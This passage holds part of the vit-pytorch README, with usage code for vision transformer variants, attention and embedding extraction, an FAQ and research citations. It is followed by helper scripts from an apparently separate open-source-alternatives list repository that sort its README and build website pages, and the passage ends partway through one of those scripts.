<img src="./images/vit_for_small_datasets.png" width="400px"></img>

This <a href="https://arxiv.org/abs/2112.13492">paper</a> proposes a new image-to-patch function that incorporates shifts of the image before normalizing and dividing it into patches. I have found shifting to be extremely helpful in some other transformers work, so I decided to include this for further exploration. It also includes the `LSA` with the learned temperature and masking out of a token's attention to itself.

You can use it as follows:

```python
import torch
from vit_pytorch.vit_for_small_dataset import ViT

v = ViT(
    image_size = 256,
    patch_size = 16,
    num_classes = 1000,
    dim = 1024,
    depth = 6,
    heads = 16,
    mlp_dim = 2048,
    dropout = 0.1,
    emb_dropout = 0.1
)

img = torch.randn(4, 3, 256, 256)

preds = v(img) # (4, 1000)
```

You can also use the `SPT` from this paper as a standalone module

```python
import torch
from vit_pytorch.vit_for_small_dataset import SPT

spt = SPT(
    dim = 1024,
    patch_size = 16,
    channels = 3
)

img = torch.randn(4, 3, 256, 256)

tokens = spt(img) # (4, 256, 1024)
```

## 3D ViT

By popular request, I will start extending a few of the architectures in this repository to 3D ViTs, for use with video, medical imaging, etc.
You will need to pass in two additional hyperparameters: (1) the number of frames `frames` and (2) patch size along the frame dimension `frame_patch_size` For starters, 3D ViT ```python import torch from vit_pytorch.vit_3d import ViT v = ViT( image_size = 128, # image size frames = 16, # number of frames image_patch_size = 16, # image patch size frame_patch_size = 2, # frame patch size num_classes = 1000, dim = 1024, depth = 6, heads = 8, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1 ) video = torch.randn(4, 3, 16, 128, 128) # (batch, channels, frames, height, width) preds = v(video) # (4, 1000) ``` 3D Simple ViT ```python import torch from vit_pytorch.simple_vit_3d import SimpleViT v = SimpleViT( image_size = 128, # image size frames = 16, # number of frames image_patch_size = 16, # image patch size frame_patch_size = 2, # frame patch size num_classes = 1000, dim = 1024, depth = 6, heads = 8, mlp_dim = 2048 ) video = torch.randn(4, 3, 16, 128, 128) # (batch, channels, frames, height, width) preds = v(video) # (4, 1000) ``` 3D version of <a href="https://github.com/lucidrains/vit-pytorch#cct">CCT</a> ```python import torch from vit_pytorch.cct_3d import CCT cct = CCT( img_size = 224, num_frames = 8, embedding_dim = 384, n_conv_layers = 2, frame_kernel_size = 3, kernel_size = 7, stride = 2, padding = 3, pooling_kernel_size = 3, pooling_stride = 2, pooling_padding = 1, num_layers = 14, num_heads = 6, mlp_ratio = 3., num_classes = 1000, positional_embedding = 'learnable' ) video = torch.randn(1, 3, 8, 224, 224) # (batch, channels, frames, height, width) pred = cct(video) ``` ## ViViT <img src="./images/vivit.png" width="350px"></img> This <a href="https://arxiv.org/abs/2103.15691">paper</a> offers 3 different types of architectures for efficient attention of videos, with the main theme being factorizing the attention across space and time. This repository includes the factorized encoder and the factorized self-attention variant. The factorized encoder variant is a spatial transformer followed by a temporal one. The factorized self-attention variant is a spatio-temporal transformer with alternating spatial and temporal self-attention layers. ```python import torch from vit_pytorch.vivit import ViT v = ViT( image_size = 128, # image size frames = 16, # number of frames image_patch_size = 16, # image patch size frame_patch_size = 2, # frame patch size num_classes = 1000, dim = 1024, spatial_depth = 6, # depth of the spatial transformer temporal_depth = 6, # depth of the temporal transformer heads = 8, mlp_dim = 2048, variant = 'factorized_encoder', # or 'factorized_self_attention' ) video = torch.randn(4, 3, 16, 128, 128) # (batch, channels, frames, height, width) preds = v(video) # (4, 1000) ``` ## Parallel ViT <img src="./images/parallel-vit.png" width="350px"></img> This <a href="https://arxiv.org/abs/2203.09795">paper</a> propose parallelizing multiple attention and feedforward blocks per layer (2 blocks), claiming that it is easier to train without loss of performance. 
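As a rough sketch of the layer structure: instead of stacking attention and feedforward blocks strictly one after another, each parallel layer runs several attention branches and several feedforward branches side by side and sums their outputs onto the residual stream. The snippet below is a simplified illustration, not the repository's implementation; `ParallelBlockSketch` and its defaults are made up for the example.

```python
import torch
from torch import nn

class ParallelBlockSketch(nn.Module):
    def __init__(self, dim, num_parallel_branches = 2, heads = 8, mlp_dim = 2048):
        super().__init__()
        self.norm = nn.LayerNorm(dim)
        self.attns = nn.ModuleList([
            nn.MultiheadAttention(dim, heads, batch_first = True)
            for _ in range(num_parallel_branches)
        ])
        self.ffs = nn.ModuleList([
            nn.Sequential(nn.LayerNorm(dim), nn.Linear(dim, mlp_dim), nn.GELU(), nn.Linear(mlp_dim, dim))
            for _ in range(num_parallel_branches)
        ])

    def forward(self, x):                                                     # x: (batch, tokens, dim)
        normed = self.norm(x)
        x = x + sum(attn(normed, normed, normed)[0] for attn in self.attns)   # parallel attention branches
        x = x + sum(ff(x) for ff in self.ffs)                                 # parallel feedforward branches
        return x

tokens = torch.randn(4, 65, 1024)
out = ParallelBlockSketch(dim = 1024)(tokens)   # (4, 65, 1024)
```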
You can try this variant as follows ```python import torch from vit_pytorch.parallel_vit import ViT v = ViT( image_size = 256, patch_size = 16, num_classes = 1000, dim = 1024, depth = 6, heads = 8, mlp_dim = 2048, num_parallel_branches = 2, # in paper, they claimed 2 was optimal dropout = 0.1, emb_dropout = 0.1 ) img = torch.randn(4, 3, 256, 256) preds = v(img) # (4, 1000) ``` ## Learnable Memory ViT <img src="./images/learnable-memory-vit.png" width="350px"></img> This <a href="https://arxiv.org/abs/2203.15243">paper</a> shows that adding learnable memory tokens at each layer of a vision transformer can greatly enhance fine-tuning results (in addition to learnable task specific CLS token and adapter head). You can use this with a specially modified `ViT` as follows ```python import torch from vit_pytorch.learnable_memory_vit import ViT, Adapter # normal base ViT v = ViT( image_size = 256, patch_size = 16, num_classes = 1000, dim = 1024, depth = 6, heads = 8, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1 ) img = torch.randn(4, 3, 256, 256) logits = v(img) # (4, 1000) # do your usual training with ViT # ... # then, to finetune, just pass the ViT into the Adapter class # you can do this for multiple Adapters, as shown below adapter1 = Adapter( vit = v, num_classes = 2, # number of output classes for this specific task num_memories_per_layer = 5 # number of learnable memories per layer, 10 was sufficient in paper ) logits1 = adapter1(img) # (4, 2) - predict 2 classes off frozen ViT backbone with learnable memories and task specific head # yet another task to finetune on, this time with 4 classes adapter2 = Adapter( vit = v, num_classes = 4, num_memories_per_layer = 10 ) logits2 = adapter2(img) # (4, 4) - predict 4 classes off frozen ViT backbone with learnable memories and task specific head ``` ## Dino <img src="./images/dino.png" width="350px"></img> You can train `ViT` with the recent SOTA self-supervised learning technique, <a href="https://arxiv.org/abs/2104.14294">Dino</a>, with the following code. 
<a href="https://www.youtube.com/watch?v=h3ij3F3cPIk">Yannic Kilcher</a> video ```python import torch from vit_pytorch import ViT, Dino model = ViT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 6, heads = 8, mlp_dim = 2048 ) learner = Dino( model, image_size = 256, hidden_layer = 'to_latent', # hidden layer name or index, from which to extract the embedding projection_hidden_size = 256, # projector network hidden dimension projection_layers = 4, # number of layers in projection network num_classes_K = 65336, # output logits dimensions (referenced as K in paper) student_temp = 0.9, # student temperature teacher_temp = 0.04, # teacher temperature, needs to be annealed from 0.04 to 0.07 over 30 epochs local_upper_crop_scale = 0.4, # upper bound for local crop - 0.4 was recommended in the paper global_lower_crop_scale = 0.5, # lower bound for global crop - 0.5 was recommended in the paper moving_average_decay = 0.9, # moving average of encoder - paper showed anywhere from 0.9 to 0.999 was ok center_moving_average_decay = 0.9, # moving average of teacher centers - paper showed anywhere from 0.9 to 0.999 was ok ) opt = torch.optim.Adam(learner.parameters(), lr = 3e-4) def sample_unlabelled_images(): return torch.randn(20, 3, 256, 256) for _ in range(100): images = sample_unlabelled_images() loss = learner(images) opt.zero_grad() loss.backward() opt.step() learner.update_moving_average() # update moving average of teacher encoder and teacher centers # save your improved network torch.save(model.state_dict(), './pretrained-net.pt') ``` ## EsViT <img src="./images/esvit.png" width="350px"></img> <a href="https://arxiv.org/abs/2106.09785">`EsViT`</a> is a variant of Dino (from above) re-engineered to support efficient `ViT`s with patch merging / downsampling by taking into an account an extra regional loss between the augmented views. To quote the abstract, it `outperforms its supervised counterpart on 17 out of 18 datasets` at 3 times higher throughput. Even though it is named as though it were a new `ViT` variant, it actually is just a strategy for training any multistage `ViT` (in the paper, they focused on Swin). The example below will show how to use it with `CvT`. You'll need to set the `hidden_layer` to the name of the layer within your efficient ViT that outputs the non-average pooled visual representations, just before the global pooling and projection to logits. ```python import torch from vit_pytorch.cvt import CvT from vit_pytorch.es_vit import EsViTTrainer cvt = CvT( num_classes = 1000, s1_emb_dim = 64, s1_emb_kernel = 7, s1_emb_stride = 4, s1_proj_kernel = 3, s1_kv_proj_stride = 2, s1_heads = 1, s1_depth = 1, s1_mlp_mult = 4, s2_emb_dim = 192, s2_emb_kernel = 3, s2_emb_stride = 2, s2_proj_kernel = 3, s2_kv_proj_stride = 2, s2_heads = 3, s2_depth = 2, s2_mlp_mult = 4, s3_emb_dim = 384, s3_emb_kernel = 3, s3_emb_stride = 2, s3_proj_kernel = 3, s3_kv_proj_stride = 2, s3_heads = 4, s3_depth = 10, s3_mlp_mult = 4, dropout = 0. 
) learner = EsViTTrainer( cvt, image_size = 256, hidden_layer = 'layers', # hidden layer name or index, from which to extract the embedding projection_hidden_size = 256, # projector network hidden dimension projection_layers = 4, # number of layers in projection network num_classes_K = 65336, # output logits dimensions (referenced as K in paper) student_temp = 0.9, # student temperature teacher_temp = 0.04, # teacher temperature, needs to be annealed from 0.04 to 0.07 over 30 epochs local_upper_crop_scale = 0.4, # upper bound for local crop - 0.4 was recommended in the paper global_lower_crop_scale = 0.5, # lower bound for global crop - 0.5 was recommended in the paper moving_average_decay = 0.9, # moving average of encoder - paper showed anywhere from 0.9 to 0.999 was ok center_moving_average_decay = 0.9, # moving average of teacher centers - paper showed anywhere from 0.9 to 0.999 was ok ) opt = torch.optim.AdamW(learner.parameters(), lr = 3e-4) def sample_unlabelled_images(): return torch.randn(8, 3, 256, 256) for _ in range(1000): images = sample_unlabelled_images() loss = learner(images) opt.zero_grad() loss.backward() opt.step() learner.update_moving_average() # update moving average of teacher encoder and teacher centers # save your improved network torch.save(cvt.state_dict(), './pretrained-net.pt') ``` ## Accessing Attention If you would like to visualize the attention weights (post-softmax) for your research, just follow the procedure below ```python import torch from vit_pytorch.vit import ViT v = ViT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 6, heads = 16, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1 ) # import Recorder and wrap the ViT from vit_pytorch.recorder import Recorder v = Recorder(v) # forward pass now returns predictions and the attention maps img = torch.randn(1, 3, 256, 256) preds, attns = v(img) # there is one extra patch due to the CLS token attns # (1, 6, 16, 65, 65) - (batch x layers x heads x patch x patch) ``` to cleanup the class and the hooks once you have collected enough data ```python v = v.eject() # wrapper is discarded and original ViT instance is returned ``` ## Accessing Embeddings You can similarly access the embeddings with the `Extractor` wrapper ```python import torch from vit_pytorch.vit import ViT v = ViT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 6, heads = 16, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1 ) # import Recorder and wrap the ViT from vit_pytorch.extractor import Extractor v = Extractor(v) # forward pass now returns predictions and the attention maps img = torch.randn(1, 3, 256, 256) logits, embeddings = v(img) # there is one extra token due to the CLS token embeddings # (1, 65, 1024) - (batch x patches x model dim) ``` Or say for `CrossViT`, which has a multi-scale encoder that outputs two sets of embeddings for 'large' and 'small' scales ```python import torch from vit_pytorch.cross_vit import CrossViT v = CrossViT( image_size = 256, num_classes = 1000, depth = 4, sm_dim = 192, sm_patch_size = 16, sm_enc_depth = 2, sm_enc_heads = 8, sm_enc_mlp_dim = 2048, lg_dim = 384, lg_patch_size = 64, lg_enc_depth = 3, lg_enc_heads = 8, lg_enc_mlp_dim = 2048, cross_attn_depth = 2, cross_attn_heads = 8, dropout = 0.1, emb_dropout = 0.1 ) # wrap the CrossViT from vit_pytorch.extractor import Extractor v = Extractor(v, layer_name = 'multi_scale_encoder') # take embedding coming from the output of multi-scale-encoder # forward pass now returns predictions and the attention 
maps img = torch.randn(1, 3, 256, 256) logits, embeddings = v(img) # there is one extra token due to the CLS token embeddings # ((1, 257, 192), (1, 17, 384)) - (batch x patches x dimension) <- large and small scales respectively ``` ## Research Ideas ### Efficient Attention There may be some coming from computer vision who think attention still suffers from quadratic costs. Fortunately, we have a lot of new techniques that may help. This repository offers a way for you to plugin your own sparse attention transformer. An example with <a href="https://arxiv.org/abs/2102.03902">Nystromformer</a> ```bash $ pip install nystrom-attention ``` ```python import torch from vit_pytorch.efficient import ViT from nystrom_attention import Nystromformer efficient_transformer = Nystromformer( dim = 512, depth = 12, heads = 8, num_landmarks = 256 ) v = ViT( dim = 512, image_size = 2048, patch_size = 32, num_classes = 1000, transformer = efficient_transformer ) img = torch.randn(1, 3, 2048, 2048) # your high resolution picture v(img) # (1, 1000) ``` Other sparse attention frameworks I would highly recommend is <a href="https://github.com/lucidrains/routing-transformer">Routing Transformer</a> or <a href="https://github.com/lucidrains/sinkhorn-transformer">Sinkhorn Transformer</a> ### Combining with other Transformer improvements This paper purposely used the most vanilla of attention networks to make a statement. If you would like to use some of the latest improvements for attention nets, please use the `Encoder` from <a href="https://github.com/lucidrains/x-transformers">this repository</a>. ex. ```bash $ pip install x-transformers ``` ```python import torch from vit_pytorch.efficient import ViT from x_transformers import Encoder v = ViT( dim = 512, image_size = 224, patch_size = 16, num_classes = 1000, transformer = Encoder( dim = 512, # set to be the same as the wrapper depth = 12, heads = 8, ff_glu = True, # ex. feed forward GLU variant https://arxiv.org/abs/2002.05202 residual_attn = True # ex. residual attention https://arxiv.org/abs/2012.11747 ) ) img = torch.randn(1, 3, 224, 224) v(img) # (1, 1000) ``` ## FAQ - How do I pass in non-square images? You can already pass in non-square images - you just have to make sure your height and width is less than or equal to the `image_size`, and both divisible by the `patch_size` ex. ```python import torch from vit_pytorch import ViT v = ViT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 6, heads = 16, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1 ) img = torch.randn(1, 3, 256, 128) # <-- not a square preds = v(img) # (1, 1000) ``` - How do I pass in non-square patches? ```python import torch from vit_pytorch import ViT v = ViT( num_classes = 1000, image_size = (256, 128), # image size is a tuple of (height, width) patch_size = (32, 16), # patch size is a tuple of (height, width) dim = 1024, depth = 6, heads = 16, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1 ) img = torch.randn(1, 3, 256, 128) preds = v(img) ``` ## Resources Coming from computer vision and new to transformers? Here are some resources that greatly accelerated my learning. 1. <a href="http://jalammar.github.io/illustrated-transformer/">Illustrated Transformer</a> - Jay Alammar 2. <a href="http://peterbloem.nl/blog/transformers">Transformers from Scratch</a> - Peter Bloem 3. 
<a href="https://nlp.seas.harvard.edu/2018/04/03/attention.html">The Annotated Transformer</a> - Harvard NLP ## Citations ```bibtex @article{hassani2021escaping, title = {Escaping the Big Data Paradigm with Compact Transformers}, author = {Ali Hassani and Steven Walton and Nikhil Shah and Abulikemu Abuduweili and Jiachen Li and Humphrey Shi}, year = 2021, url = {https://arxiv.org/abs/2104.05704}, eprint = {2104.05704}, archiveprefix = {arXiv}, primaryclass = {cs.CV} } ``` ```bibtex @misc{dosovitskiy2020image, title = {An Image is Worth 16x16 Words: Transformers for Image Recognition at Scale}, author = {Alexey Dosovitskiy and Lucas Beyer and Alexander Kolesnikov and Dirk Weissenborn and Xiaohua Zhai and Thomas Unterthiner and Mostafa Dehghani and Matthias Minderer and Georg Heigold and Sylvain Gelly and Jakob Uszkoreit and Neil Houlsby}, year = {2020}, eprint = {2010.11929}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{touvron2020training, title = {Training data-efficient image transformers & distillation through attention}, author = {Hugo Touvron and Matthieu Cord and Matthijs Douze and Francisco Massa and Alexandre Sablayrolles and Hervé Jégou}, year = {2020}, eprint = {2012.12877}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{yuan2021tokenstotoken, title = {Tokens-to-Token ViT: Training Vision Transformers from Scratch on ImageNet}, author = {Li Yuan and Yunpeng Chen and Tao Wang and Weihao Yu and Yujun Shi and Francis EH Tay and Jiashi Feng and Shuicheng Yan}, year = {2021}, eprint = {2101.11986}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{zhou2021deepvit, title = {DeepViT: Towards Deeper Vision Transformer}, author = {Daquan Zhou and Bingyi Kang and Xiaojie Jin and Linjie Yang and Xiaochen Lian and Qibin Hou and Jiashi Feng}, year = {2021}, eprint = {2103.11886}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{touvron2021going, title = {Going deeper with Image Transformers}, author = {Hugo Touvron and Matthieu Cord and Alexandre Sablayrolles and Gabriel Synnaeve and Hervé Jégou}, year = {2021}, eprint = {2103.17239}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{chen2021crossvit, title = {CrossViT: Cross-Attention Multi-Scale Vision Transformer for Image Classification}, author = {Chun-Fu Chen and Quanfu Fan and Rameswar Panda}, year = {2021}, eprint = {2103.14899}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{wu2021cvt, title = {CvT: Introducing Convolutions to Vision Transformers}, author = {Haiping Wu and Bin Xiao and Noel Codella and Mengchen Liu and Xiyang Dai and Lu Yuan and Lei Zhang}, year = {2021}, eprint = {2103.15808}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{heo2021rethinking, title = {Rethinking Spatial Dimensions of Vision Transformers}, author = {Byeongho Heo and Sangdoo Yun and Dongyoon Han and Sanghyuk Chun and Junsuk Choe and Seong Joon Oh}, year = {2021}, eprint = {2103.16302}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{graham2021levit, title = {LeViT: a Vision Transformer in ConvNet's Clothing for Faster Inference}, author = {Ben Graham and Alaaeldin El-Nouby and Hugo Touvron and Pierre Stock and Armand Joulin and Hervé Jégou and Matthijs Douze}, year = {2021}, eprint = {2104.01136}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{li2021localvit, title = {LocalViT: Bringing Locality to Vision Transformers}, author = {Yawei Li and Kai Zhang and 
Jiezhang Cao and Radu Timofte and Luc Van Gool}, year = {2021}, eprint = {2104.05707}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{chu2021twins, title = {Twins: Revisiting Spatial Attention Design in Vision Transformers}, author = {Xiangxiang Chu and Zhi Tian and Yuqing Wang and Bo Zhang and Haibing Ren and Xiaolin Wei and Huaxia Xia and Chunhua Shen}, year = {2021}, eprint = {2104.13840}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{su2021roformer, title = {RoFormer: Enhanced Transformer with Rotary Position Embedding}, author = {Jianlin Su and Yu Lu and Shengfeng Pan and Bo Wen and Yunfeng Liu}, year = {2021}, eprint = {2104.09864}, archivePrefix = {arXiv}, primaryClass = {cs.CL} } ``` ```bibtex @misc{zhang2021aggregating, title = {Aggregating Nested Transformers}, author = {Zizhao Zhang and Han Zhang and Long Zhao and Ting Chen and Tomas Pfister}, year = {2021}, eprint = {2105.12723}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{chen2021regionvit, title = {RegionViT: Regional-to-Local Attention for Vision Transformers}, author = {Chun-Fu Chen and Rameswar Panda and Quanfu Fan}, year = {2021}, eprint = {2106.02689}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{wang2021crossformer, title = {CrossFormer: A Versatile Vision Transformer Hinging on Cross-scale Attention}, author = {Wenxiao Wang and Lu Yao and Long Chen and Binbin Lin and Deng Cai and Xiaofei He and Wei Liu}, year = {2021}, eprint = {2108.00154}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{caron2021emerging, title = {Emerging Properties in Self-Supervised Vision Transformers}, author = {Mathilde Caron and Hugo Touvron and Ishan Misra and Hervé Jégou and Julien Mairal and Piotr Bojanowski and Armand Joulin}, year = {2021}, eprint = {2104.14294}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{he2021masked, title = {Masked Autoencoders Are Scalable Vision Learners}, author = {Kaiming He and Xinlei Chen and Saining Xie and Yanghao Li and Piotr Dollár and Ross Girshick}, year = {2021}, eprint = {2111.06377}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{xie2021simmim, title = {SimMIM: A Simple Framework for Masked Image Modeling}, author = {Zhenda Xie and Zheng Zhang and Yue Cao and Yutong Lin and Jianmin Bao and Zhuliang Yao and Qi Dai and Han Hu}, year = {2021}, eprint = {2111.09886}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{fayyaz2021ats, title = {ATS: Adaptive Token Sampling For Efficient Vision Transformers}, author = {Mohsen Fayyaz and Soroush Abbasi Kouhpayegani and Farnoush Rezaei Jafari and Eric Sommerlade and Hamid Reza Vaezi Joze and Hamed Pirsiavash and Juergen Gall}, year = {2021}, eprint = {2111.15667}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{mehta2021mobilevit, title = {MobileViT: Light-weight, General-purpose, and Mobile-friendly Vision Transformer}, author = {Sachin Mehta and Mohammad Rastegari}, year = {2021}, eprint = {2110.02178}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{lee2021vision, title = {Vision Transformer for Small-Size Datasets}, author = {Seung Hoon Lee and Seunghyun Lee and Byung Cheol Song}, year = {2021}, eprint = {2112.13492}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{renggli2022learning, title = {Learning to Merge Tokens in Vision Transformers}, author = {Cedric Renggli and André Susano Pinto and Neil Houlsby and 
Basil Mustafa and Joan Puigcerver and Carlos Riquelme}, year = {2022}, eprint = {2202.12015}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{yang2022scalablevit, title = {ScalableViT: Rethinking the Context-oriented Generalization of Vision Transformer}, author = {Rui Yang and Hailong Ma and Jie Wu and Yansong Tang and Xuefeng Xiao and Min Zheng and Xiu Li}, year = {2022}, eprint = {2203.10790}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @inproceedings{Touvron2022ThreeTE, title = {Three things everyone should know about Vision Transformers}, author = {Hugo Touvron and Matthieu Cord and Alaaeldin El-Nouby and Jakob Verbeek and Herv'e J'egou}, year = {2022} } ``` ```bibtex @inproceedings{Sandler2022FinetuningIT, title = {Fine-tuning Image Transformers using Learnable Memory}, author = {Mark Sandler and Andrey Zhmoginov and Max Vladymyrov and Andrew Jackson}, year = {2022} } ``` ```bibtex @inproceedings{Li2022SepViTSV, title = {SepViT: Separable Vision Transformer}, author = {Wei Li and Xing Wang and Xin Xia and Jie Wu and Xuefeng Xiao and Minghang Zheng and Shiping Wen}, year = {2022} } ``` ```bibtex @inproceedings{Tu2022MaxViTMV, title = {MaxViT: Multi-Axis Vision Transformer}, author = {Zhengzhong Tu and Hossein Talebi and Han Zhang and Feng Yang and Peyman Milanfar and Alan Conrad Bovik and Yinxiao Li}, year = {2022} } ``` ```bibtex @article{Li2021EfficientSV, title = {Efficient Self-supervised Vision Transformers for Representation Learning}, author = {Chunyuan Li and Jianwei Yang and Pengchuan Zhang and Mei Gao and Bin Xiao and Xiyang Dai and Lu Yuan and Jianfeng Gao}, journal = {ArXiv}, year = {2021}, volume = {abs/2106.09785} } ``` ```bibtex @misc{Beyer2022BetterPlainViT title = {Better plain ViT baselines for ImageNet-1k}, author = {Beyer, Lucas and Zhai, Xiaohua and Kolesnikov, Alexander}, publisher = {arXiv}, year = {2022} } ``` ```bibtex @article{Arnab2021ViViTAV, title = {ViViT: A Video Vision Transformer}, author = {Anurag Arnab and Mostafa Dehghani and Georg Heigold and Chen Sun and Mario Lucic and Cordelia Schmid}, journal = {2021 IEEE/CVF International Conference on Computer Vision (ICCV)}, year = {2021}, pages = {6816-6826} } ``` ```bibtex @article{Liu2022PatchDropoutEV, title = {PatchDropout: Economizing Vision Transformers Using Patch Dropout}, author = {Yue Liu and Christos Matsoukas and Fredrik Strand and Hossein Azizpour and Kevin Smith}, journal = {ArXiv}, year = {2022}, volume = {abs/2208.07220} } ``` ```bibtex @misc{https://doi.org/10.48550/arxiv.2302.01327, doi = {10.48550/ARXIV.2302.01327}, url = {https://arxiv.org/abs/2302.01327}, author = {Kumar, Manoj and Dehghani, Mostafa and Houlsby, Neil}, title = {Dual PatchNorm}, publisher = {arXiv}, year = {2023}, copyright = {Creative Commons Attribution 4.0 International} } ``` ```bibtex @inproceedings{Dehghani2023PatchNP, title = {Patch n' Pack: NaViT, a Vision Transformer for any Aspect Ratio and Resolution}, author = {Mostafa Dehghani and Basil Mustafa and Josip Djolonga and Jonathan Heek and Matthias Minderer and Mathilde Caron and Andreas Steiner and Joan Puigcerver and Robert Geirhos and Ibrahim M. Alabdulmohsin and Avital Oliver and Piotr Padlewski and Alexey A. Gritsenko and Mario Luvci'c and Neil Houlsby}, year = {2023} } ``` ```bibtex @misc{vaswani2017attention, title = {Attention Is All You Need}, author = {Ashish Vaswani and Noam Shazeer and Niki Parmar and Jakob Uszkoreit and Llion Jones and Aidan N. 
Gomez and Lukasz Kaiser and Illia Polosukhin}, year = {2017}, eprint = {1706.03762}, archivePrefix = {arXiv}, primaryClass = {cs.CL} } ``` ```bibtex @inproceedings{dao2022flashattention, title = {Flash{A}ttention: Fast and Memory-Efficient Exact Attention with {IO}-Awareness}, author = {Dao, Tri and Fu, Daniel Y. and Ermon, Stefano and Rudra, Atri and R{\'e}, Christopher}, booktitle = {Advances in Neural Information Processing Systems}, year = {2022} } ``` ```bibtex @inproceedings{Darcet2023VisionTN, title = {Vision Transformers Need Registers}, author = {Timoth'ee Darcet and Maxime Oquab and Julien Mairal and Piotr Bojanowski}, year = {2023}, url = {https://api.semanticscholar.org/CorpusID:263134283} } ``` ```bibtex @inproceedings{ElNouby2021XCiTCI, title = {XCiT: Cross-Covariance Image Transformers}, author = {Alaaeldin El-Nouby and Hugo Touvron and Mathilde Caron and Piotr Bojanowski and Matthijs Douze and Armand Joulin and Ivan Laptev and Natalia Neverova and Gabriel Synnaeve and Jakob Verbeek and Herv{\'e} J{\'e}gou}, booktitle = {Neural Information Processing Systems}, year = {2021}, url = {https://api.semanticscholar.org/CorpusID:235458262} } ``` ```bibtex @inproceedings{Koner2024LookupViTCV, title = {LookupViT: Compressing visual information to a limited number of tokens}, author = {Rajat Koner and Gagan Jain and Prateek Jain and Volker Tresp and Sujoy Paul}, year = {2024}, url = {https://api.semanticscholar.org/CorpusID:271244592} } ``` ```bibtex @article{Bao2022AllAW, title = {All are Worth Words: A ViT Backbone for Diffusion Models}, author = {Fan Bao and Shen Nie and Kaiwen Xue and Yue Cao and Chongxuan Li and Hang Su and Jun Zhu}, journal = {2023 IEEE/CVF Conference on Computer Vision and Pattern Recognition (CVPR)}, year = {2022}, pages = {22669-22679}, url = {https://api.semanticscholar.org/CorpusID:253581703} } ``` ```bibtex @misc{Rubin2024, author = {Ohad Rubin}, url = {https://medium.com/@ohadrubin/exploring-weight-decay-in-layer-normalization-challenges-and-a-reparameterization-solution-ad4d12c24950} } ``` *I visualise a time when we will be to robots what dogs are to humans, and I’m rooting for the machines.* — Claude Shannon
awesome-oss-alternatives
09d7f8b76ef063c5987caf6361110904f449ece6
File: sort.py def sort_readme(): with open("README.md", "r", encoding="utf-8") as f: all = f.readlines() table_start = "|Category|Company|Description|GitHub Stars|Alternative to|\n" table_end = "<!-- END STARTUP LIST -->\n" idx = all.index(table_start) idx_end = all.index(table_end) find_name = lambda x: x[x.index("[") + 1 : x.index("]")].strip() find_cat = lambda x: x[: x.index("|")].strip() pairs = [(find_cat(x), find_name(x)) for x in all[idx + 2 : idx_end - 1]] sorted_pairs = sorted(pairs) right_elements = [all[idx + 2 : -1][pairs.index(i)] for i in sorted_pairs] all[idx + 2 : idx_end - 1] = right_elements with open("README.md", "w", encoding="utf-8") as f: f.writelines(all) if __name__ == "__main__": sort_readme() File: build_website.py import yaml import os def remove_github_com(s: str): return s.replace("https://github.com/", "") def remove_https(s: str): s = s.replace("https://", "") s = s.replace("http://", "") return s.strip("/") markdown_template = """ # {company_name} <a href="{link}"><img src="https://icons.duckduckgo.com/ip3/{clean_link}.ico" alt="Avatar" width="30" height="30" /></a> [![GitHub stars](https://img.shields.io/github/stars/{clean_gh_link}.svg?style=social&label=Star&maxAge=2592000)](https://GitHub.com/{clean_gh_link}/stargazers/) [![GitHub forks](https://img.shields.io/github/forks/{clean_gh_link}.svg?style=social&label=Fork&maxAge=2592000)](https://GitHub.com/{clean_gh_link}/network/) [![GitHub issues](https://img.shields.io/github/issues/{clean_gh_link}.svg)](https://GitHub.com/N{clean_gh_link}/issues/) [![GitHub license](https://img.shields.io/github/license/{clean_gh_link}.svg)](https://github.com/{clean_gh_link}/blob/master/LICENSE) [![GitHub contributors](https://img.shields.io/github/contributors/{clean_gh_link}.svg)](https://GitHub.com/{clean_gh_link}/graphs/contributors/) **Category**: {category} **Github**: [{clean_gh_link}]({gh_link}) **Website**: [{clean_link}]({link}) **Description**: {description} **Alternative to**: {alts} """ SPECIAL_MAPPING = { "ELT / ETL": "ETL", "Robotic Process Automation (RPA)": "Robotic Process Automation", "OPAL (Permit.io)": "OPAL", } appl = lambda x: SPECIAL_MAPPING[x] if x in SPECIAL_MAPPING else x def get_all_companies(): arr = [] for filename in os.listdir("submissions"): if filename.endswith(".yaml"): with open(f"submissions/{filename}", "r", encoding="utf-8") as file: obj = yaml.load(file, yaml.Loader) obj["category"] = appl(obj["category"]) 